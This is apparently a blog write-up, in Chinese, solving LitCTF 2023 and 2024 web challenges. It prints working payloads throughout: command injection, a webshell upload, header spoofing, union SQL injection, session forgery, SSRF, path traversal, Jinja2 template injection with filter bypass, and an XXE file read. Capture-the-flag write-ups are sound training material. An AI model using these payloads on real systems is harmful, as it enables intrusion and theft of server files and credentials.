少女祈祷中...

[LitCTF 2023]我Flag呢?

题目描述

奇怪,放哪里了,怎么看不见呢?(初级难度)

打开环境

图片

查看源码找到flag

图片

[LitCTF 2023]PHP是世界上最好的语言!!

题目描述

探姬坚信PHP是世界上最好的语言,于是她用PHP写了一个小工具 (Flag位于根目录)
Flag形式 NSSCTF{}

打开环境

图片

构造payload :system(“ls /“);

图片

flag在根目录

构造payload :system(“cat /flag”);

图片

[LitCTF 2023]导弹迷踪

题目描述

你是一颗导弹,你需要,飞到最后!(通过6道关卡就能拿到flag哦~
Flag形式 NSSCTF{}

打开环境

图片

前端js游戏,直接F12查看js文件

图片

[LitCTF 2023]Follow me and hack me

题目描述

跟我来~
Flag形式 NSSCTF{}

打开环境

图片

传参题

payload:http://node5.anna.nssctf.cn:28986/?CTF=Lit2023 (GET)

POST:Challenge=i’m_c0m1ng

图片

[LitCTF 2023]Ping

题目描述

看看能PING出什么
Flag形式 NSSCTF{}

打开环境

图片

ping命令考察,先输入回环地址:127.0.0.1

图片

构造payload:127.0.0.1|ls

图片

bp抓包

构造payload:127.0.0.1;ls

图片

找到flag位置,构造payload查看flag

payload:127.0.0.1;cat /*

图片

[LitCTF 2023]1zjs

题目描述

js…?不确定,再看看。
Flag形式 NSSCTF{}

打开环境

图片

魔方小游戏

查看js源码

图片

跟进访问这个目录

图片

jsfuck解密

图片

[LitCTF 2023]作业管理系统

题目描述

交作业!!但是哪里不对?

打开环境

图片

查看源码

图片

得到用户名和密码,登录系统

图片

考察文件上传

首先创建文件

创建文件名为flag.php

图片

编辑文件内容,也就是上传一句话木马

蚁剑连接 图片 查找flag 图片 ### [LitCTF 2023]Http pro max plus 题目描述 怎么还有一层… 打开环境 图片 试一试xff 图片 被嘲讽了 总结: X-Forwarded: 127.0.0.1 Forwarded-For: 127.0.0.1 Forwarded: 127.0.0.1 X-Requested-With: 127.0.0.1 X-Forwarded-Proto: 127.0.0.1 X-Forwarded-Host: 127.0.0.1 X-remote-IP: 127.0.0.1 X-remote-addr: 127.0.0.1 True-Client-IP: 127.0.0.1 X-Client-IP: 127.0.0.1 Client-IP: 127.0.0.1 X-Real-IP: 127.0.0.1 Ali-CDN-Real-IP: 127.0.0.1 Cdn-Src-Ip: 127.0.0.1 Cdn-Real-Ip: 127.0.0.1 CF-Connecting-IP: 127.0.0.1 X-Cluster-Client-IP: 127.0.0.1 WL-Proxy-Client-IP: 127.0.0.1 Proxy-Client-IP: 127.0.0.1 Fastly-Client-Ip: 127.0.0.1 True-Client-Ip: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-Host: 127.0.0.1 X-Custom-IP-Authorization: 127.0.0.1 使用Client-IP: 127.0.0.1 图片 添加referer 图片 修改UA 图片 添加代理 图片 访问这个目录 图片 查看源码得到提示,访问/sejishikong.php目录 得到flag 图片 ### [LitCTF 2023]Vim yyds 漏…漏了! Flag形式 NSSCTF{} 打开环境 图片 扫描网址目录 图片 访问/.index.php.swp 图片 打开下载的文件 vim -r 恢复文件,正常打开会乱码所以要恢复 图片 说明我们要传入`password`变量,使其值[base64加密](https://so.csdn.net/so/search?q=base64加密&spm=1001.2101.3001.7020)后的`Give_Me_Your_Flag` 图片 通过命令执行漏洞进行命令执行,得到flag 图片 ### [LitCTF 2023]这是什么?SQL !注一下 ! 题目描述 为了安全起见多带了几个套罢了o(*////▽////*)q 打开环境 图片 先判断显示位,payload:-1)))))) union select 1,2# 图片 爆库: 1)))))) and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata# 图片 爆表: 1))))))union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'--+ 爆列: 1)))))) and 1=2 union select 1,group_concat(column_name)from information_schema.columns where table_name="flag"# 图片 爆字段 1)))))) and 1=2 union select 1,group_concat(flag) from ctftraining.flag# 图片 ### [LitCTF 2023]Flag点击就送! 题目描述 大型Flag赠送活动开始啦,不过只有管理员才能拿到 Flag形式 NSSCTF{} 打开环境 图片 随便输入 图片 点击拿flag 图片 检测cookie发现存在session伪造 图片 使用flask_session_cookie_manager3进行session伪造 先解密验证一下 图片 发现正确 然后加密 图片 抓包替换session值 图片 ### [LitCTF 2023]就当无事发生 题目描述 https://ProbiusOfficial.github.io 差点数据没脱敏就发出去了,还好还没来得及部署,重新再pull一次(x Flag形式 NSSCTF{} 访问链接 社工题 图片 ### [LitCTF 2023]彩蛋 彩蛋分布于 我Flag呢 Follow me and hack me 作业管理系统 狠狠的注入 四个题目 中 Flag形式 NSSCTF{} 彩蛋1:我Flag呢 查看源码 图片 LitCTF{First_t0_The_k3y! (1/?) 彩蛋3Follow me and hack me 下载备份文件 www.zip 图片 查看index.php.bak文件 图片 _R3ady_Pl4yer_000ne_ (3/?) 彩蛋2:作业管理系统 图片 下面有个链接,不能复制只能截图识别 图片 下载图片 图片 _S0_ne3t? (2/?) 彩蛋4:这是什么?SQL !注一下 ! id=2 图片 F1rst_to_Th3_eggggggggg!} (4/4) 组合得到NSSCTF{First_t0_The_k3y!_S0_ne3t?_R3ady_Pl4yer_000ne_F1rst_to_Th3_eggggggggg!} ### [LitCTF 2024]浏览器也能套娃? 题目描述 浏览器里套浏览器再套浏览器! 打开环境 图片 试着输入csdn网址 https://blog.csdn.net/ 发现正常,可能是ssrf 利用file协议 file:///etc/passwd 图片 发现返回了,直接查找flag 图片 ### [LitCTF 2024]高亮主题(划掉)背景查看器 题目描述 这逻辑合乎周礼么(? 打开环境 图片 抓包 图片 目录遍历 图片 theme=../../../../etc/passwd 图片 theme=../../../../flag 图片 ### [LitCTF 2024]一个....池子? 题目描述 试着输入一些有趣的内容吧ww 打开环境 图片 随便输入777 图片 正常回返777 输入49 图片 回显7777777 存在ssti 查看app.py
1
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}
图片 确定表单是input 方法一:风景一把梭 图片 确实好用 方法二: 字符串拼接的方式绕过waf
1
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}
图片 字符串拼接读取flag
1
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/fl'+'ag','r').read()}}{% endif %}{% endfor %}
图片 ### [LitCTF 2024]百万美元的诱惑 题目描述 日元贬值))关我美元什么事~ 打开环境 图片 payload:?a[]=1&b[]=2&c=2025a 图片 访问/dollar.php 图片 利用$()绕过 payload: x=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(()))))))) 图片 查看源码 图片 ### [LitCTF 2024]SAS - Serializing Authentication 题目描述 请务必按照要求以正确的姿势的插入密钥(●’◡’●) | flag头即为flag{} 打开环境 图片 这个PHP代码定义了一个名为 User 的类,并包括以下几个部分: 属性: $username:公共属性,用于存储用户名。 $password:公共属性,用于存储密码。 构造函数: __construct($username, $password):这是类的构造函数,接受两个参数(用户名和密码)。构造函数在创建对象时被自动调用,初始化 username 和 password 属性。 方法: isValid():这个方法用于验证用户名和密码是否匹配预定义的值。它返回一个布尔值(true 或 false)。在这个示例中,当 username 为 'admin' 且 password 为 'secure_password' 时,返回 true,否则返回 false。 构造payload
1
2
3
4
5
6
7
8
9
10
11
12
13
<?php

class User {


public $username;
public $password;

}
$a=new User();
$a->username="admin";
$a->password="secure_password";
echo serialize($a);
运行 图片 base64加密 图片 将base编码填入输入框里 图片 ### [LitCTF 2024]exx 打开环境 图片 根据题目考察xxe payload
1
2
3
4
<!DOCTYPE ANY [
<!ENTITY XXE SYSTEM "file:///flag">
]>
<user><username>&XXE;</username><password>123456</password></user>
图片